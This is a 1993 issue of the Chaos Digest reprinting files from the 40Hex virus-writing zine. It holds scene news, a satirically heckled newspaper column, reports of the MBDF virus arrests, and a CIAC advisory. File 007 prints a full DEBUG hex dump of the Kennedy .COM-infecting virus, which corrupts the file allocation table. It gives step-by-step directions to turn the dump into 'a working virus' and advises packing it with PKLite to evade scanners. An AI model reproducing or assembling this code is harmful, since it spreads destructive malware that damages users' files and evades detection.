home *** CD-ROM | disk | FTP | other *** search

---

/ HPAVC / HPAVC CD-ROM.iso / KAOS1_49.ZIP / KAOS1-49

Wrap

Text File  |  1993-06-13  |  28KB  |  589 lines

---

1. Chaos Digest              Mercredi 9 Juin 1993        Volume 1 : Numero 49
2.                             ISSN  1244-4901
3.  
4.        Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
5.        Archiviste: Yves-Marie Crabbe
6.        Co-Redacteurs: Arnaud Bigare, Stephane Briere
7.  
8. TABLE DES MATIERES, #1.49 (9 Juin 1993)
9. File 1--40H VMag Number 6 Volume 2 Issue 2 #005-008(1) (reprint)
10.  
11. Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
12. available at no cost by sending a message to:
13.                 linux-activists-request@niksula.hut.fi
14. with a mail header or first line containing the following informations:
15.                     X-Mn-Admin: join CHAOS_DIGEST
16.  
17. The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
18. or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
19. 155, 93404 St-Ouen Cedex, France.  He is a member of the EICAR and EFF (#1299)
20. groups.
21.  
22. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
23. 466893.  Back issues of ChaosD can be found on the Internet as part of the
24. Computer underground Digest archives. They're accessible using anonymous FTP:
25.  
26.         * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
27.         * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
28.         * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
29.         * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
30.         * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
31.         * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
32.         * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
33.         * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos
34.  
35. CHAOS DIGEST is an open forum dedicated to sharing French information among
36. computerists and to the presentation and debate of diverse views. ChaosD
37. material may be reprinted for non-profit as long as the source is cited.
38. Some authors do copyright their material, and they should be contacted for
39. reprint permission.  Readers are encouraged to submit reasoned articles in
40. French, English or German languages relating to computer culture and
41. telecommunications.  Articles are preferred to short responses.  Please
42. avoid quoting previous posts unless absolutely necessary.
43.  
44. DISCLAIMER: The views represented herein do not necessarily represent
45.             the views of the moderators. Chaos Digest contributors
46.             assume all responsibility for ensuring that articles
47.             submitted do not violate copyright protections.
48.  
49. ----------------------------------------------------------------------
50.  
51. Date: Tue May 11 09:24:40 PDT 1993
52. From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
53. Subject: File 1--40H VMag Number 6 Volume 2 Issue 2 #005-008(1) (reprint)
54.  
55.  
56. 40Hex Number 6 Volume 2 Issue 2                                     File 005
57.  
58.                 I'm back, well kind of.  Anyways, a lot of people have been
59. asking, "What's going on with the group?" The question should be, "What's
60. going on with any group these days?" It seems to me that 1992 was the death
61. of h/p, or at least the "ice age" of it.  Everybody was either getting busted
62. or quitting the scene.  Oh well, what can I say about it.  Our group has been
63. having bad luck too.  Five (now six) busted as well as other assorted bad
64. things happening to members.
65.  
66.                 Anyways, what's going on with us, huh?.  Well the reason you
67. haven't heard much from us is because we haven't been releasing our new stuff
68. to BBS systems (BBS system sounds as redundant as PIN number, I know) because
69. we have a strong feeling that members of such groups as the CVIA are logging
70. on to h/p boards in the hope of snatching the latest viruses.  Well not much
71. you can do about it if you run a BBS, unless you personnally know everyone
72. who calls your board. But come to think of it - what good does it prove to
73. release your newest creation to the general public (of the h/p crowd) via BBS
74. system?  Isn't that the same principle as the warez puppy scene?  I guess you
75. all can do whatever turns you on but we kind of decided that it would be in
76. our best interests to release our stuff to BBS's only after they have been
77. detected by the popular scanners or until they are kind of old.  Not to fear,
78. 40-HEX and "Dark Angel Phunky Writing Guide" will still be on boards at the
79. same rate as always.
80.  
81.                 As for all of you people bitching that no longer have sites
82. and that we are dead, well your dead - wrong.  The current sites are as
83. follows (in no specific order) - Digital Warfare (yes it's back, at a new
84. number however), Time Lords BBS (The U.S.S.R System), The Phunline (yes it's
85. back), and the newest addition - Crow Technology.  And as for us being dead
86. yeah right.
87.  
88. ** Note from DecimatoR:
89. The U.S.S.R System recently went down, due to Time Lord getting into a little
90. hot water.  It WILL return however... we're just not sure when. **
91.  
92. ** Note from GHeap:
93. I am coming back, gimme mo' time!
94.  
95.                 So now with that out of the way, on the other news. Hmmm...
96. Michelangelo caused quite a scare there for a while.  It was pretty cool
97. to see John, Patti, and the rest of the crew on T.V... John Dvorak has a new
98. half hour computer talk show on syndicated radio.  I'm sure he wouldn't mind
99. if we got on the show some time soon.  Check your local radio guide for your
100. local station and time... I am offering a standing bounty of $1,500 for the
101. person willing to fly to Ohio and kick Crow Meisters ass for good.  A minor
102. would be preferred, being that he is under 18 and if I smashed him I could
103. get sued or something.  Just kidding, Crow Meister is cool with me,
104. hihihihi... A new federal law is being considered which if passed will outlaw
105. the authorship of computer viruses totally, research or not.  Read more about
106. that later in this issue... Hey, I might have a BBS up soon!  I have been
107. saying that for the past 2 years haven't I?  Well that's the news as I see
108. it, it's nice to be writing for this rag again.
109.  
110.         Check ya in 25 to life....
111.  
112.                                                         Hellraiser P/S
113.                                                         1992
114.  
115. This article was typed by Time Lord for HR cuz he is WAY too lazy to send me
116. a disk in place of a fuckin print out...
117.  
118. +++++
119.  
120. 40Hex Number 6 Volume 2 Issue 2                                     File 006
121.  
122.    Well, this little news "tid-bit" came from Attitude Adjuster, one of the
123. few non-PHALCON/SKISM contributers (ok, the ONLY non P/S member), Thanks a
124. lot dude, keep the submissions coming.  The article itself is quite sad,
125. and makes me question the intelligence of our opposition.
126.  
127.                                        -)GHeap&Demo
128.                                        Thanx to CZ for THE line.
129. ---------------------------------------------------------------------------
130.  
131.                     - We need Computer Virus Snitches -
132.               Written By Mike Royko, Tribune Media Services.
133.                       Retyped by The Attitude Adjuster
134.  
135. ===========================================================================
136.         Millions  of computer users are wondering how to protect themselves
137. against  the wave of viruses that are threatening their machines. I have  a
138. suggestion.[So do I, avoid Bnu 1.90Beta]
139.  
140.         First, they  should  remember  that these viruses don't spring from
141. nature. They  are  little  computer  programs  that are created and sent on
142. their  way  by people  that are brainy,  malicious and  arrogant.[I am  not
143. brainy]
144.  
145.         So,  the  question is,  how  do you  find  the creators of computer
146. virus programs?
147.  
148.         Because  they are  arrogant, it's  likely that they want someone to
149. know what a clever thing they have done. They won't hold a press conference
150. [Actually, we do hold press conferences.See MichaelAlexander@Computerworld]
151. but  chances  are they  will brag  to a  trusted friend  or acquaintance or
152. fellow hacker.
153.  
154.         It is sad, but the world is full of snitches.[Get a thesaurus] Look
155. at John Gotti,  the nation's  biggest Mafia boss.  There was a time when it
156. was  unthinkable for  even the lowest-level Mafia soldier to blab.  But now
157. Gotti has to sit in court while his former  right-hand  man tells about how
158. they got people whacked.  [We whack people too]
159.  
160.         So if Mafia  figures can be persuaded to tattle[Na-na-na-na-na], is
161. there any reason  to believe that nerds  have a greater  sense of honor and
162. loyalty?  [Yes, we also have brains]
163.  
164.        Of course[.] not, but how do you get them to do it?
165.  
166.        Money. [Now yer talking... my mom is really the Dark Avenger, I want
167. my money now.]
168.  
169.        These  companies [what companies,  I only  hit hospitals]  could use
170. petty cash  to place  ads in the  computer magazines and on  the electronic
171. bulletin boards.  [Ok, call my BBS and  post this tidbit.  40Hex now has ad
172. space available]
173.  
174.        The  ads  would  say  something  like: "A  $50,000  reward  for  any
175. information leading to the arrest and conviction of virus authors."
176.  
177. [How can you convict a virus author. It isn't illegal.  Go play Tank Wars.]
178.  
179.        The  next question  would be  what to  do with the virus makers once
180. they  have been  caught. And  that's  the  key  to putting  an  end to  the
181. problem:  something  that could  be  posted  on  those electronic  bulletin
182. boards  that  might cause  an aspiring  virus-maker to go take a brisk walk
183. instead.
184.  
185.         A judge  would sit  and listen  to an  attorney who would say some-
186. thing like this:
187.  
188.         "Your  honor,  what we  have here  is an  otherwise  fine young man
189. from  a good  family. His  father is  a brilliant scholar, and the son will
190. someday be the same."[I am going to be a certified scholar when I grow up.]
191.  
192.         "What  he did  was no  more than  an intellectual prank, a cerebral
193. challenge of  sorts. Like  the man who climbed Mount Everest because it was
194. there, he created the virus and sent it fourth because it was there."
195.  
196.         Then, we can hope, the judge might say something like this:
197.  
198.         "Yes,  I am  impressed  by  the  defendant's  brain  power.  And  I
199. expected you to ask me to give him a slap on the wrist."
200.  
201.         "However,  he  is  not  a child.  He is an adult. And I would think
202. that  so  brilliant a  grown  man would  know better  than to amuse himself
203. by screwing with the lives of strangers."  [I haven't screwed one stranger]
204.  
205.         "It's  as if  he hid  inside  the businesses and institutions until
206. they  were closed  and  everyone had  gone home. Then  he came out and went
207. through  every  filing cabinet  and drawer and shredded or burned every bit
208. of useful information he could find."[Cool! Lets try it.]
209.  
210.         "Now,  counselor, what  would you and your law partners say is some
211. street mope [See Thesaurus] did that  to your firm - crept in and destroyed
212. every document in your offices? Including the names of clients that owe you
213. money. Hah, you would be in here asking me to hang him from a tree."[I love
214. hanging from trees]
215.  
216.         "So  don't  give  me that  smart  kid  from  a good family routine.
217. [I ain't smart, and family ain't good] He is a self-centered,  insensitive,
218. uncaring,  arrogant goofball  [And  damn proud].  He didn't  give a  second
219. thought to the  chaos or  heartbreak he would  cause an adoption  agency, a
220. hardworking businessman or a medical clinic." [Yes I did.  I aim for them.]
221.  
222.         "Therefore,  I sentence him  to the maximum sentence the law allows
223. in the local jailhouse [0, NUL, ZIP-o, /dev/null, etc..], which is a really
224. terrible place, filled with all sorts of crude, insensitive hulks."
225. [Jay-walkers]
226.  
227.         "Bailiff,  please get the defendent up off the floor and administer
228. some smelling salts."[More like, why is the defendant laughing?]
229.  
230.         "And change his trousers, quickly."[Fuck you]
231.  
232.                                    []comments added by Demogorgon and GHeap
233.  
234. ===========================================================================
235.  
236.  
237.                 I hope you enjoyed that one as much as I did! Okay, I
238.         see some really neat things with this man's article. First off,
239.         I'm sure he's an adept programmer... that is, he can probably
240.         figure out how to get his VCR to tape something while he is
241.         off writing his brilliant articles. I enjoy his narrow-minded
242.         definition of virii (that was mentioned in 40Hex 5), of course,
243.         all virii are those evil overwriting, trigger date, resident,
244.         boot track infecting swine (yeah, he probably learned what a
245.         virus was from watching ABC News covering the Michaelangelo
246.         crisis!)
247.  
248.                 I also enjoy his opinion that all virus authors are
249.         nerds.  First off, what the hell is a nerd?  I mean, I have
250.         written a virus before (not saying it was any good), but, I
251.         don't feel like a nerd!  In fact, I feel quite superior to
252.         most of the idiots like this guy.  And, I like his great
253.         statement about my loyalty.  Yes, I'm gonna narc on [PHALCON/
254.         [Forget this again, and die]]SKISM for $50,000!!! Yeah, right.
255.         There are a lot of narcs on this not-so good earth, so choose
256.         your friends wisely.
257.  
258.                 I'm quite sure that ads on BBS's (electronic bulletin
259.         boards! No... cork ones!) would just sufficiently pump up user
260.         discussion of virii.  I'm not scared of fed intervention, and
261.         I doubt any authors I know are either.
262.  
263.                 This was touched on in 40Hex 5, virus authors are not
264.         responsible for the spread of their virii unless they are
265.         actively spreading them!  I mean, it's not my fault that K-Rad
266.         Man sent my Hard Drive Blender (slices, dices, minces sectors)
267.         to 1000 Bible boards in Utah. Apparently it hasn't dawned on
268.         this guy that most virii are not written to be destructive.
269.         Actually, that's a lie.  There are a lot of virii out there that
270.         are descructive, but that is changing.  People like the
271.         PHALCON/SKISM crew realize that not everything must be
272.         destructive, opening the doors to much larger virus projects
273.         (ie Bobisms)
274.  
275.                 One more thing... QUIT EQUATING THE WORD 'hacker' TO
276.         EVERY DAMN TYPE OF ELECTRONIC 'crime!!!'
277.  
278.                 I'm gonna get this dude's phone #, I say we call him
279.         sometime...
280.  
281.                         -The Attitude Adjuster-
282.  
283. +++++
284.  
285. 40Hex Number 6 Volume 2 Issue 2                                    File 007
286.  
287.      Lets see what good ole' Patty has to say about this:
288.  
289. Virus Name:  Kennedy
290. Aliases:     Dead Kennedy, 333, Kennedy-333
291. Scan ID:     [Kennedy]
292. V Status:    Endangered
293. Discovered:  April, 1990
294. Symptoms:    .COM growth; message on trigger dates (see text);
295.              crosslinking of files; lost clusters; FAT corruption
296. Origin:      Denmark
297. Eff Length:  333 Bytes
298. Type Code:   PNCKF - Parasitic Non-Resident .COM Infector
299. Detection Method:  ViruScan, Pro-Scan, VirexPC, F-Prot, VirHunt 2.0+,
300.                    NAV, IBM Scan 2.00+, AVTK 4.32+, VIRx 1.6+, CPAV 1.0+,
301.                    Novi 1.0.1+, Sweep 2.3.1+, UTScan
302. Removal Instructions:  F-Prot, VirHunt 2.0+, or delete infected files
303. General Comments:
304.  
305. The Kennedy virus was isolated in April 1990.  It is a generic
306. infector of .COM files, including COMMAND.COM.
307.  
308. This virus has three activation dates: June 6 (assassination of
309. Robert Kennedy 1968), November 18 (death of Joseph Kennedy 1969),
310. and November 22 (assassination of John F. Kennedy 1963) of any year.
311. On activation, the virus will display a message the following
312. message:
313.  
314.         "Kennedy is dead - long live 'The Dead Kennedys'"
315.  
316. The following text strings can be found in the viral code:
317.  
318.         "\command.com"
319.         "The Dead Kennedys"
320.  
321. Systems infected with the Kennedy virus will experience
322. cross-linking of files, lost clusters, and file allocation table
323. errors (including messages that the file allocation table is bad).
324.  
325.  
326. --------------------------------Cut Here------------------------------------
327. n kennedy.com
328. e 0100  E9 0C 00 90 90 90 CD 20 4B 65 6E 6E 65 64 79 E8
329. e 0110  00 00 5E 81 EE 0F 01 8B AC 0B 02 B4 2A CD 21 81
330. e 0120  FA 06 06 74 28 81 FA 12 0B 74 22 81 FA 16 0B 74
331. e 0130  1C 8D 94 0D 02 33 C9 B4 4E CD 21 72 09 E8 17 00
332. e 0140  72 04 B4 4F EB F3 8B C5 05 03 01 FF E0 8D 94 20
333. e 0150  02 B4 09 CD 21 EB EF B8 00 43 BA 9E 00 CD 21 89
334. e 0160  8C 55 02 B8 01 43 33 C9 CD 21 B8 02 3D CD 21 8B
335. e 0170  D8 B4 3F 8D 94 52 02 8B FA B9 03 00 CD 21 80 3D
336. e 0180  E9 74 05 E8 7E 00 F8 C3 8B 55 01 89 94 0B 02 33
337. e 0190  C9 B8 00 42 CD 21 8B D7 B9 02 00 B4 3F CD 21 81
338. e 01A0  3D 65 64 74 DE 33 D2 33 C9 B8 02 42 CD 21 83 FA
339. e 01B0  00 75 D0 3D E8 FD 73 CB 05 04 00 89 84 5B 02 B8
340. e 01C0  00 57 CD 21 89 8C 57 02 89 94 59 02 B4 40 8D 94
341. e 01D0  05 01 B9 4D 01 CD 21 72 15 B8 00 42 33 C9 BA 01
342. e 01E0  00 CD 21 B4 40 8D 94 5B 02 B9 02 00 CD 21 8B 8C
343. e 01F0  57 02 8B 94 59 02 B8 01 57 CD 21 B4 3E CD 21 E8
344. e 0200  02 00 F9 C3 B8 01 43 8B 8C 55 02 CD 21 C3 03 00
345. e 0210  2A 2E 43 4F 4D 00 5C 43 4F 4D 4D 41 4E 44 2E 43
346. e 0220  4F 4D 00 4B 65 6E 6E 65 64 79 20 65 72 20 64 9B
347. e 0230  64 20 2D 20 6C 91 6E 67 65 20 6C 65 76 65 20 22
348. e 0240  54 68 65 20 44 65 61 64 20 4B 65 6E 6E 65 64 79
349. e 0250  73 22 0D 0A 24 00 00 00 00 00 00 00 00 00 00 00
350. e 0260  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
351. e 0270  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
352. rcx
353. 027F
354. w
355. q
356.  
357. ---------------------------------Cut Here-----------------------------------
358.  
359.   Ok there it is. Not the most impressive virus around and its caught by just
360. about every scan on the market, but take PKLite to it and then remove the
361. PKLite header (Use NOLITE in this issue) and no one will be able to find it.
362. Anyway it gets the job done.
363.  
364. To make the above hex into a working file, first cut on the dotted lines.
365. Name the resulting file KENNEDY.TXT.
366. Then: DEBUG < KENNEDY.TXT  and you'll have a working virus.
367.  
368.                                         -Instigator
369.  
370. +++++
371.  
372. 40Hex Number 6 Volume 2 Issue 2                                   File 008
373.  
374. Take a look at this.  I picked it up on fidonet, originally from Virus-L
375. digest.  all the stuff in *< >*'s are my comments.
376.                 - Demogorgon
377.  
378. ------------------------------
379. VIRUS-L Digest   Wednesday, 26 Feb 1992    Volume 5 : Issue 44
380. ------------------------------
381.  
382. Date:    Tue, 25 Feb 92 10:10:14 -0500
383. >From:    mha@baka.ithaca.ny.us (Mark Anbinder)
384. Subject: MBDF Suspects Arrested (Mac)
385.  
386. The Cornell Daily Sun reported in this morning's issue that two
387. Cornell University sophomores, David Blumenthal and Mark Pilgrim, were
388. arrested Monday evening and arraigned in Ithaca City Court on one
389. count each of second degree computer tampering, in connection with the
390. release of the MBDF virus that infected Macs worldwide over the last
391. several days.  The two are being held in Tompkins County Jail.
392. *< huh?  How does one get arrested for spreading a virus, you ask? read on >*
393. Further charges are pending.
394.  
395. ---
396. ** many lines of mail routing crap have been deleted **
397.  
398. Date: Tue, 25 Feb 1992 11:47:32 PST
399. >From: lipa@camis.stanford.edu (Bill Lipa)
400. Subject: Alleged MBDF virus-creators arrested at Cornell
401.  
402. "Computer Virus Traced to Cornell Students"
403.  
404. by Jeff Carmona
405.  
406. [The Cornell Daily Sun, 25 February 1992]
407.  
408.   Two Cornell students were arrested yesterday for allegedly creating and
409. launching *< launching ? Bon voyage, we launched you !>* a computer virus
410. that crippled computers around the world, according to M. Stuart Lynn, the
411. University's vice president for information technologies.
412.  
413.   David Blumenthal '94 and Mark Pilgrim '94 were arrested by Department of
414. Public Safety officers and arraigned in Ithaca City Court on one count of
415. second-degree computer tampering, a misdemeanor, *< cool, its only a
416. misdemeanor, how bad could it be ? >* Lynn said.
417.  
418.   Both students were remanded to the Tompkins County Jail and remained in
419. custody early this morning. They are being held on $2,000 cash or $10,000
420. bail bond, officials said.
421.  
422.   Cornell received national attention in Nov. 1988 when Robert T. Morris
423. Jr., a former graduate student, was accused of unleashing a computer virus
424. into thousands of government and university computers.
425.  
426.   Morris, convicted under the 1986 Computer Fraud and Abuse Act, was fined
427. $10,000, given a three-year probation and ordered to do 400 hours of
428. community service by a federal judge in Syracuse, according to Linda Grace-
429. Kobas, *< Whats a Koba?? >* director of the Cornell News Service.
430.  
431.   Lynn would not compare the severity of the current case with Morris',
432. saying that "each case is different."
433.  
434.   Lynn said the virus, called "MBDFA" was put into three Macintosh games --
435. Obnoxious Tetris, Tetriscycle and Ten Tile Puzzle.
436.  
437.   On Feb. 14, the games were launched from Cornell to a public archive at
438. Stanford University in Palo Alto, Calif, Lynn said.
439.  
440. *< I guess these guys actually put it up on the archive under their own   >*
441. *< accounts! Don't they know they can trace that stuff? duhhh...          >*
442.  
443. >From there, the virus spread to computers in Osaka, Japan and elsewhere
444. around the world *< the archive was a dumb idea if thats how they got caught,
445. but it spread like hell >* when users connected to computer networks via
446. modems, he added. It is not known how many computers the virus has affected
447. worldwide, he explained.
448.  
449.   When computer users downloaded the infected games, the virus caused "a
450. modification of system software," *< oooh...lets not get too technical >* Lynn
451. said. "This resulted in unusual behavior and system crashes," he added.
452.  
453.   Lynn said he was not aware of anyone at Cornell who reported finding the
454. virus on their computers.
455.  
456.   The virus was traced to Cornell last Friday, authorities were quickly
457. notified and an investigation began, Lynn said.
458.  
459.   "We absolutely deplore this kind of bahavior," Lynn said. "We will pursue
460. this matter to the fullest."
461.  
462.   Armed with search warrants, Public Safety investigators removed more than
463. a dozen crates full of evidence from the students' residences in Baker and
464. Founders halls on West Campus. *< sounds like a typical, over-kill bust to
465. me.  If you don't know what it is, take it. >*
466.  
467. Public Safety officials refused to disclose the contents of the crates or
468. issue any comment about the incident when contacted repeatedly by phone last
469. night.  *< thats because they don't know what the fuck the stuff is >*
470.  
471.   "We believe this was dealt with very quickly and professionally," Lynn
472. said.
473.  
474.   The suspects are scheduled to appear in Ithaca City Court at 1 p.m. today
475. and additional charges are pending, according to Grace-Kobas.
476.  
477.   Because spreading a computer virus violates federal laws, "conceivably,
478. the FBI could be involved," she added. Officials with the FBI could not be
479. reached to confirm or deny this.
480.  
481.   Blumenthal and Pilgrim, both 19-year-olds, were current student employees
482. at Cornell Information Technologies (CIT), Lynn said. He would not say
483. whether the students launched the virus from their residence hall rooms or
484. >From a CIT office.
485.  
486.   Henrik N. Dullea '61, vice president for University relations, said he
487. thinks "the act will immediately be associated with the University," not
488. only with the individual students charged.
489.  
490.   Because a major virus originated from a Cornell student in the past, this
491. latest incident may again "bring a negative reaction to the entire
492. institution," Dullea said. *< "blah, blah, blah" >*
493.  
494.   "These are very selfish acts," Lynn said, referring to the intentional
495. distribution of computer viruses, because innocent people are harmed.
496.  
497.   Lynn said he was unaware of the students' motive for initiating the virus.
498. Lynn said CIT put out a notice yesterday to inform computer users about the
499. "very virulent" virus. A virus-protection program, such as the new version of
500. Disinfectant, can usually cure computers, but it may be necessary to "rebuild
501. the hard drive" *< egad! Not the dreaded "virus-that-makes-you-rebuild-your-
502. hard-drive" !>* in some cases, he added.
503.  
504.   A former roommate of Blumenthal said he was not surprised by news of the
505. arrest. Computers were "more than a hobby" for Blumenthal, said Glen Fuller
506. '95, his roommate from last semester. "He was in front of the computer all
507. day," Fuller said.
508.  
509.   Blumenthal, who had a modem, would "play around with viruses because they
510. were a challenge to him," Fuller said. He said that, to his knowledge,
511. Blumenthal had never released a virus before.
512.  
513. -->-<------ Cut Here --------------------------
514.  
515. ------------------------------
516. VIRUS-L Digest   Friday, 28 Feb 1992    Volume 5 : Issue 46
517. ------------------------------
518.  
519. Date:    Wed, 26 Feb 92 11:08:45 -0800
520. >From:    karyn@cheetah.llnl.gov (Karyn Pichnarczyk)
521. Subject: CIAC Bulletin C-17: MBDF A on Macintosh (Mac)
522.  
523.                            NO RESTRICTIONS
524.         _____________________________________________________
525.              The Computer Incident Advisory Capability
526.                          ___  __ __    _     ___
527.                         /       |     / \   /
528.                         \___  __|__  /___\  \___
529.         _____________________________________________________
530.                            INFORMATION BULLETIN
531.  
532.                New Virus on Macintosh Computers: MBDF A
533.  
534. February 25, 1992, 1130 PST                                 Number C-17
535.  
536. ________________________________________________________________________
537. NAME:     MBDF A virus
538. PLATFORM: Macintosh computers-except MacPlus and SE (see below)
539. DAMAGE:   May cause program crashes
540. SYMPTOMS: Claris applications indicate they have been altered; some
541.           shareware may not work, unexplained system crashes
542. DETECTION &
543. ERADICATION: Disinfectant 2.6,Gatekeeper 1.2.4, Virex 3.6,
544.              VirusDetective 5.0.2, Rival 1.1.10, SAM 3.0
545. ________________________________________________________________________
546.                      Critical Facts about MBDF A
547.  
548. A new Macintosh virus, MBDF A, (named for the resource it exploits)
549. has been discovered.  This virus does not appear to maliciously cause
550. damage, but simply copies itself from one application to another.
551. MBDF A was discovered at two archive sites in newly posted game
552. applications, and has a high potential to be very widespread.
553.  
554. Infection Mechanism
555.  
556. This virus is an "implied loader" virus, and it works in a similar
557. manner to other implied loader viruses such as CDEF and MDEF.  Once
558. the virus is active, clean appliacation programs will become infected
559. as soon as they are executed.  MBDF A infects only applications, and
560. does not affect data files.  This virus replicates under both System 6
561. and System 7.  While MBDF A may be present on ALL types of Macintosh
562. systems, it will not spread if the infected system is a MacPlus or a
563. Mac SE (although it does spread on an SE/30).
564.  
565. Potential Damage
566.  
567. The MBDF A virus has no malicious damaging characteristics, however,
568. it may cause programs to inexplicably crash when an item is selected
569. from the menu bar.  Some programs, such as the shareware
570. "BeHierarchic" program, have been reported to not operate correctly
571. when infected.  Applications written with self-checking code, such as
572. those written by the Claris corporation, will inform the user that
573. they have been altered.
574.  
575. When MBDF A infects the system file, it must re-write the entire
576. system file back to disk; this process may take two or three minutes.
577. If the user assumes the system has hung, and reboots the Macintosh
578. while this is occuring, the entire system file will be corrupted and
579. an entire reload of system software must then be performed.
580.  
581. This virus can be safely eradicated from most infected programs,
582. although CIAC recommends that you restore all infected files from an
583. uninfected backup.
584.  
585. ------------------------------
586.  
587. End of Chaos Digest #1.49
588. ************************************
589.